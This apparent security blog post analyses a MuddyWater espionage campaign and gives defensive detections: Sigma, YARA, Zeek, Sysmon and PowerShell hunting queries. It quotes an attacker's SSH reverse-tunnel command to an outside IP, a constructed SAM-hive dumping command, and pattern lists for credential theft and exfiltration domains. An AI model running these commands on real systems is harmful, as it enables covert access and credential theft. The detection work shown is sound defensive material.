
Introduction:
In a sophisticated cyber-espionage campaign uncovered by Symantec’s Threat Hunter Team, the Iran-linked APT group MuddyWater (also known as Seedworm, Static Kitten, and TEMP.Zagros) successfully breached at least nine high-value organizations across four continents, including a major South Korean electronics manufacturer where attackers maintained undetected access for an entire week in February 2026. The campaign’s most alarming technical innovation lies in its abuse of legitimate, signed binaries from Fortemedia (fmapp.exe) and SentinelOne (sentinelmemoryscanner.exe) to sideload malicious DLLs, effectively turning trusted software—including a component from a leading EDR solution—into an unwitting accomplice in the attack chain.
Learning Objectives:
- Master DLL sideloading detection by analyzing legitimate signed binary abuse and identifying anomalous process relationships involving fmapp.exe, sentinelmemoryscanner.exe, and node.exe
- Implement comprehensive hunting strategies to detect ChromElevator credential theft, PowerShell-based reconnaissance, and SOCKS5 tunneling for lateral movement
- Deploy custom YARA and Sigma rules alongside network monitoring for sendit.sh exfiltration traffic to disrupt MuddyWater’s living-off-the-land tactics
You Should Know:
- Understanding the Attack Chain: From RDP Access to Node.js-Driven Persistence
The initial access vector in documented intrusions involved Terminal Services/RDP login, followed by the establishment of an SSH tunnel for covert command and control. Huntress analysts observed attackers using the following SSH command to create a reverse tunnel:
`C:\Windows\System32\OpenSSH\ssh.exe -p 22 -o StrictHostKeyChecking=no hunter@185[.]185[.]71[.]185 -2 -4 -N -R 10841`
What makes this campaign particularly noteworthy is the prominent role of Node.js in orchestrating malicious activity. Symantec researchers noted that “the early PowerShell process tree was unusual in that node.exe, the Node.js runtime, appeared as an ancestor of cmd.exe, suggesting that a Node.js script was already running on the host at the time and that it, rather than a human operator, was driving the activity”. This node.exe-based implant chain deployed PowerShell scripts responsible for reconnaissance, screenshot capture, SAM hive theft, privilege escalation, and SOCKS5 reverse-proxy tunneling.
To hunt for similar activity across your environment, deploy the following PowerShell one-liner to identify suspicious process ancestry involving node.exe:
New-Item -ItemType Directory -Path C:\ThreatHunt -Force | Out-Null
Get-WinEvent -FilterHashtable @{LogName='Microsoft-Windows-Sysmon/Operational'; ID=1} | Where-Object { $_.Message -match 'ParentImage: .*\\node\.exe' } | ForEach-Object { $_.Message } | Out-File C:\ThreatHunt\node_ancestry.txt
Additionally, monitor for instances where PowerShell is spawned with `-EncodedCommand` parameters originating from unexpected parent processes. The following Sysmon configuration snippet can help log these critical process creation events:
<Sysmon schemaversion="4.22">
  <EventFiltering>
    <RuleGroup name="" groupRelation="or">
      <ProcessCreate onmatch="include">
        <!-- groupRelation="and" makes both filters apply together; without the Rule
             wrapper Sysmon ORs them and would log every powershell.exe launch -->
        <Rule groupRelation="and">
          <ParentImage condition="end with">node.exe</ParentImage>
          <Image condition="end with">powershell.exe</Image>
        </Rule>
      </ProcessCreate>
    </RuleGroup>
  </EventFiltering>
</Sysmon>
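The Sysmon filter above catches only the direct parent. The following Python example, added here and not taken from Symantec's or Huntress's reporting, links constructed Sysmon Event ID 1 records by ProcessGuid/ParentProcessGuid, walks the whole chain so that node.exe is found even when cmd.exe sits in between, and decodes any `-EncodedCommand` argument (base64 over UTF-16LE) so the script block can be read. The records, GUIDs, paths and the decoded command are constructed for the example.

```python
import base64
import ntpath
import re

# Constructed decoded script (not campaign data): what sits behind -EncodedCommand.
_DECODED = r"whoami /pric; reg save HKLM\SAM C:\Users\Public\sam.hiv"
ENC = base64.b64encode(_DECODED.encode("utf-16-le")).decode("ascii")
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

# Constructed Sysmon Event ID 1 (ProcessCreate) records using Sysmon's field names.
# GUIDs are shortened placeholders. The chain mirrors the one the report describes:
# explorer.exe -> node.exe -> cmd.exe -> powershell.exe.
SAMPLE_EVENTS = [
    {"ProcessGuid": "{A1}", "ParentProcessGuid": "{A0}",
     "Image": r"C:\Windows\explorer.exe", "CommandLine": "explorer.exe"},
    {"ProcessGuid": "{A2}", "ParentProcessGuid": "{A1}",
     "Image": r"C:\Program Files\nodejs\node.exe",
     "CommandLine": r"node.exe C:\Users\Public\svc.js"},
    {"ProcessGuid": "{A3}", "ParentProcessGuid": "{A2}",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c powershell -nop -w hidden -EncodedCommand " + ENC},
    {"ProcessGuid": "{A4}", "ParentProcessGuid": "{A3}",
     "Image": PS, "CommandLine": "powershell -nop -w hidden -EncodedCommand " + ENC},
    # Benign control: PowerShell started from Explorer with no node.exe above it.
    {"ProcessGuid": "{B1}", "ParentProcessGuid": "{A1}",
     "Image": PS, "CommandLine": "powershell.exe Get-Date"},
]

# Matches -e, -ec, -enc, -EncodedCommand, ... followed by a base64 blob of plausible length.
ENCODED_RE = re.compile(r"-e[a-z]*\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)
INTERESTING = {"cmd.exe", "powershell.exe", "pwsh.exe"}


def base_name(image):
    return ntpath.basename(image).lower()


def ancestry(events, guid):
    """Image basenames from the process itself up to the root, oldest ancestor last."""
    by_guid = {e["ProcessGuid"]: e for e in events}
    chain, seen = [], set()
    while guid in by_guid and guid not in seen:  # 'seen' guards against GUID loops
        seen.add(guid)
        chain.append(base_name(by_guid[guid]["Image"]))
        guid = by_guid[guid]["ParentProcessGuid"]
    return chain


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload, or None if there is none."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def hunt(events, suspicious_ancestor="node.exe"):
    """Flag shells/PowerShell with the suspicious image anywhere in their ancestry."""
    findings = []
    for e in events:
        chain = ancestry(events, e["ProcessGuid"])
        if chain[0] in INTERESTING and suspicious_ancestor in chain[1:]:
            findings.append({
                "guid": e["ProcessGuid"],
                "chain": " <- ".join(chain),
                "decoded": decode_encoded_command(e["CommandLine"]),
            })
    return findings


if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS):
        print(f["guid"], f["chain"])
        if f["decoded"]:
            print("  decoded:", f["decoded"])
```

Feed it the ProcessCreate events exported from the Sysmon channel (for example as JSON from a SIEM) and the benign Explorer-launched PowerShell is left alone while both members of the node.exe chain are returned with their decoded script block.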
- Abusing Trust: Sideloading Signed Binaries for Malicious DLL Execution
The cornerstone of this campaign’s evasion strategy involves DLL sideloading using two digitally signed, legitimate binaries. Attackers placed malicious DLLs alongside these trusted executables to exploit Windows’ DLL search order:
- fmapp.exe (legitimate Fortemedia audio-driver utility) → sideloads fmapp.dll containing ChromElevator
- sentinelmemoryscanner.exe (signed SentinelOne security component) → sideloads sentinelagentcore.dll containing ChromElevator
“Using a signed SentinelOne component to load malicious code creates a situation where the very tool organizations rely on for endpoint protection becomes part of the attack chain,” researchers emphasized. The choice is deliberate: security teams often exclude their own EDR processes from scrutiny, granting implicit trust to binaries from SentinelOne, CrowdStrike, and similar vendors.
To detect this exact technique, deploy the following Sigma rule (YAML format) in your SIEM environment to alert on suspicious DLL loads from these binaries:
title: MuddyWater DLL Sideloading Detection
id: 8f4a3b2c-1d6e-4a9f-8b3c-5e7f9a2b4c6d
status: experimental
description: Detects DLL sideloading via fmapp.exe or sentinelmemoryscanner.exe
logsource:
    product: windows
    service: sysmon
detection:
    selection:
        EventID: 7
        Image|endswith:
            - '\fmapp.exe'
            - '\sentinelmemoryscanner.exe'
        ImageLoaded|endswith:
            - '\fmapp.dll'
            - '\sentinelagentcore.dll'
    condition: selection
falsepositives:
    - Authorized Fortemedia or SentinelOne software updates
level: high
For immediate triage across your Windows fleet, run this PowerShell command to scan for the malicious file pairs:
Get-ChildItem -Path C:\ -Recurse -ErrorAction SilentlyContinue -Include "fmapp.exe","sentinelmemoryscanner.exe" | ForEach-Object {
    $directory = $_.DirectoryName
    if ((Test-Path "$directory\fmapp.dll") -or (Test-Path "$directory\sentinelagentcore.dll")) {
        Write-Host "Potential sideloading detected in: $directory" -ForegroundColor Red
        # Show the DLL's Authenticode status: a sideloaded DLL is typically unsigned or
        # signed by someone other than the vendor of the executable next to it
        Get-ChildItem $directory -File | Where-Object { $_.Name -match "fmapp\.dll|sentinelagentcore\.dll" } |
            ForEach-Object { Get-AuthenticodeSignature $_.FullName } |
            Format-List Path, Status, SignerCertificate
    }
}
- Bypassing Chrome’s App-Bound Encryption: ChromElevator in Action
The malicious DLLs deployed by MuddyWater contained ChromElevator, an open-source post-exploitation tool designed specifically to bypass Google Chrome’s App-Bound Encryption (ABE) protection. According to iThome’s analysis, this capability allows attackers to “steal passwords, cookies, and payment data stored in browsers” by operating within the browser’s security context.
ChromElevator operates as a two-stage system: an injector orchestrates process creation and payload delivery, and the payload executes within the browser’s security context to perform decryption and data extraction. Organizations should monitor for anomalous access to Chrome’s `Local State` file and the `User Data` directory from unexpected processes. The following PowerShell script surfaces processes other than chrome.exe that create or overwrite those files (Sysmon Event ID 11 records file creation and overwrite, not reads; read access requires an audit SACL on the profile directory and Security event 4663):
Get-WinEvent -FilterHashtable @{LogName='Microsoft-Windows-Sysmon/Operational'; ID=11} | Where-Object {
    $_.Message -match 'Local State' -or $_.Message -match 'Cookies' -or $_.Message -match 'Login Data'
} | Where-Object {
    # Escape the path for the regex: an unescaped "\P" is an invalid .NET regex escape
    $_.Message -notmatch [regex]::Escape('C:\Program Files\Google\Chrome\Application\chrome.exe')
} | Select-Object TimeCreated,
    @{Name="Process";    Expression={ [regex]::Match($_.Message, 'Image: (.+)').Groups[1].Value.Trim() }},
    @{Name="TargetFile"; Expression={ [regex]::Match($_.Message, 'TargetFilename: (.+)').Groups[1].Value.Trim() }}
To proactively defend against ChromElevator-style attacks, security teams should deploy YARA rules targeting the tool’s unique byte sequences. A basic YARA rule to detect ChromElevator payloads:
rule ChromElevator_Detect {
    meta:
        description = "Detects ChromElevator credential stealer"
        author = "Threat Intelligence Team"
        date = "2026-05-26"
    strings:
        $s1 = "Chrome-App-Bound-Encryption-Decryption" wide ascii
        // IElevator is also the name of Chrome's own elevation-service COM interface,
        // so on its own it would match legitimate Chrome binaries
        $s2 = "IElevator" wide ascii
        $s3 = "DecryptMasterKey" wide ascii
    condition:
        // The wildcard is required: "2 of ($s)" names a string $s that does not exist
        // and the rule fails to compile
        2 of ($s*)
}
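To make the rule's semantics concrete, the following Python example, added here rather than taken from the page or from YARA, reproduces what `wide ascii` and `2 of ($s*)` mean: each declared string is searched both as plain ASCII and as UTF-16LE, and the rule fires only when at least two distinct identifiers hit. The two byte blobs are constructed stand-ins for a suspect payload and for a Chrome-like binary that legitimately contains `IElevator`; they are not real samples.

```python
# Constructed blobs standing in for scanned files (not real samples).
SUSPECT_BLOB = (
    b"MZ\x90\x00" + b"\x00" * 32
    + b"IElevator\x00"
    + "DecryptMasterKey".encode("utf-16-le")   # 'wide' form: a NUL after each character
    + b"\x00" * 16
)
CHROME_LIKE_BLOB = b"MZ\x90\x00" + b"\x00" * 32 + b"IElevator\x00" + b"chrome.dll\x00"

# The strings from the YARA rule on the page, keyed by their identifiers.
STRINGS = {
    "$s1": "Chrome-App-Bound-Encryption-Decryption",
    "$s2": "IElevator",
    "$s3": "DecryptMasterKey",
}


def encoded_forms(text):
    """The two byte patterns YARA searches for a string declared 'wide ascii'."""
    return {"ascii": text.encode("ascii"), "wide": text.encode("utf-16-le")}


def find_strings(data, strings=STRINGS):
    """Map each identifier to the (encoding, offset) pairs at which it occurs in data."""
    hits = {}
    for ident, text in strings.items():
        for form, needle in encoded_forms(text).items():
            start = 0
            while (off := data.find(needle, start)) != -1:
                hits.setdefault(ident, []).append((form, off))
                start = off + 1
    return hits


def rule_matches(data, minimum=2):
    """Equivalent of the condition '2 of ($s*)': at least two distinct identifiers hit."""
    return len(find_strings(data)) >= minimum


if __name__ == "__main__":
    for name, blob in (("suspect", SUSPECT_BLOB), ("chrome-like", CHROME_LIKE_BLOB)):
        print(name, rule_matches(blob), find_strings(blob))
```

The Chrome-like blob hits `$s2` once and nothing else, so the two-string threshold is what keeps the rule from firing on the browser itself; the suspect blob hits `$s2` in ASCII and `$s3` in its wide form, which a rule without `wide` would miss.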
- Living Off the Land: PowerShell Reconnaissance and Credential Theft
Once inside victim networks, MuddyWater operators leveraged PowerShell for extensive discovery and credential harvesting operations. Symantec’s report documented attacks using PowerShell scripts for “reconnaissance, screenshot capture, SAM hive theft, privilege escalation, and SOCKS5 reverse-proxy tunneling”.
Threat hunters should look for specific command-line artifacts observed in MuddyWater intrusions, including typos that ironically serve as potential indicators, such as `whoami /pric` instead of `whoami /priv`. The following Splunk query can help identify suspicious PowerShell activity indicative of MuddyWater’s TTPs:
index=windows source="WinEventLog:Microsoft-Windows-PowerShell/Operational" EventCode=4104
| search ScriptBlockText="*Get-Screenshot*" OR ScriptBlockText="*reg save*" OR ScriptBlockText="*Invoke-Socks5Proxy*" OR ScriptBlockText="*whoami /pric*"
| table _time, ComputerName, UserName, ScriptBlockText
| sort -_time
For credential theft specifically, monitor for attempts to access the SAM, SECURITY, and SYSTEM registry hives. The following Sigma rule detects such activity:
title: Suspicious Registry Hive Access
id: b7e8c4d9-3f2a-4b8e-9c1d-6a4f8e2b5c7a
logsource:
    product: windows
    service: security
detection:
    # 4663 only fires for objects that carry an audit SACL; set one on the hive
    # files and on the HKLM\SAM, SECURITY and SYSTEM keys first.
    selection_file:
        EventID: 4663
        ObjectType: "File"
        # endswith on the full path: a bare contains "\SYSTEM" would also match
        # every path under \System32 (Sigma matching is case-insensitive)
        ObjectName|endswith:
            - '\Windows\System32\config\SAM'
            - '\Windows\System32\config\SECURITY'
            - '\Windows\System32\config\SYSTEM'
    # "reg save HKLM\SAM" reads through the registry API, not the hive file
    selection_key:
        EventID: 4663
        ObjectType: "Key"
        ObjectName|endswith:
            - '\REGISTRY\MACHINE\SAM'
            - '\REGISTRY\MACHINE\SECURITY'
            - '\REGISTRY\MACHINE\SYSTEM'
    condition: 1 of selection_*
falsepositives:
    - Backup software and legitimate system maintenance tools
level: high
- Exfiltration Through Consumer Cloud Services: The sendit.sh Vector
To blend malicious traffic with normal activity and evade network detection controls, MuddyWater exfiltrated stolen data using sendit[.]sh, a legitimate public file-sharing service. This technique represents a growing trend among APT groups who recognize that many organizations lack granular visibility into outbound connections to consumer-grade cloud platforms.
To detect this specific exfiltration vector, implement network monitoring rules that flag outbound connections to `sendit.sh` and similar file-sharing domains from production servers, workstations, and critical assets. A Zeek (formerly Bro) script snippet to generate alerts:
@load base/frameworks/notice
@load base/protocols/http

redef enum Notice::Type += { Exfiltration_Via_File_Sharing };

const exfil_hosts: set[string] = { "sendit.sh", "transfer.sh", "file.io" } &redef;

# Runs once the request has been fully parsed, so c$http$host is populated (it is
# not yet set inside http_request). sendit.sh is served over TLS, so mirror this
# check on the SNI in ssl_extension_server_name.
event http_message_done(c: connection, is_orig: bool, stat: http_message_stat)
{
    if ( is_orig && c?$http && c$http?$host && to_lower(c$http$host) in exfil_hosts )
    {
        local f = fmt("%s made a connection to %s", c$id$orig_h, c$http$host);
        NOTICE([$note=Exfiltration_Via_File_Sharing, $msg=f, $conn=c]);
    }
}
Additionally, monitor for suspicious high-volume outbound traffic to these services during off-hours. The following PowerShell script queries network connection events from the last 7 days for potential exfiltration patterns:
$exfilDomains = @("sendit.sh", "transfer.sh", "file.io", "anonfiles.com")
# Escape the dots so "file.io" does not also match "fileXio". DestinationHostname in
# Sysmon ID 3 comes from Sysmon's reverse lookup of the IP, so CDN-fronted services may
# not show the expected name; pair this with Sysmon ID 22 (DNS query) events.
$pattern = ($exfilDomains | ForEach-Object { [regex]::Escape($_) }) -join "|"
$events = Get-WinEvent -FilterHashtable @{
    LogName   = 'Microsoft-Windows-Sysmon/Operational'
    ID        = 3
    StartTime = (Get-Date).AddDays(-7)
} -ErrorAction SilentlyContinue
$events | Where-Object { $_.Message -match $pattern } | ForEach-Object {
    [PSCustomObject]@{
        Timestamp = $_.TimeCreated
        SourceIP  = [regex]::Match($_.Message, 'SourceIp: ([\d.]+)').Groups[1].Value
        DestIP    = [regex]::Match($_.Message, 'DestinationIp: ([\d.]+)').Groups[1].Value
        DestHost  = [regex]::Match($_.Message, 'DestinationHostname: (.+)').Groups[1].Value.Trim()
        Process   = [regex]::Match($_.Message, 'Image: (.+)').Groups[1].Value.Trim()
    }
}
What Undercode Say:
- Key Takeaway 1: Trust as a vulnerability. MuddyWater’s abuse of signed SentinelOne binaries demonstrates that even trusted security tools can be weaponized. Organizations must apply zero-trust principles to EDR telemetry and implement DLL sideloading detection across all processes, regardless of vendor reputation.
- Key Takeaway 2: Automation enables stealth. The use of Node.js scripts to orchestrate PowerShell activity, rather than manual operator commands, represents a significant operational maturity upgrade for MuddyWater, making their intrusions harder to distinguish from legitimate automated processes.
Analysis: This campaign marks a concerning evolution in MuddyWater’s tradecraft. Previously characterized by noisy, operator-driven attacks, the group has shifted toward highly disciplined, automated operations that abuse legitimate software components to evade detection. The geographic expansion beyond the Middle East into Asia, Europe, and the Americas signals broader Iranian intelligence priorities focused on industrial and intellectual property theft. The 90-second beaconing cadence and implant-driven access patterns suggest these intrusions are designed for long-term data collection rather than rapid smash-and-grab operations, meaning many victim organizations may still have undetected MuddyWater access active within their networks.
Prediction: Within the next 6-12 months, expect to see copycat groups adopting MuddyWater’s playbook, particularly the technique of weaponizing EDR vendor binaries for DLL sideloading. This will force a paradigm shift in endpoint detection strategies, requiring security teams to implement process ancestry analysis and cryptographic hash verification for all signed binaries executing in enterprise environments. Organizations that fail to update their detection logic to identify anomalous behavior rather than relying on signature-based vendor trust will face significant exposure to this emerging class of supply chain-style evasion techniques.
Reported By: Hackermohitkumar Muddywater – Hackers Feeds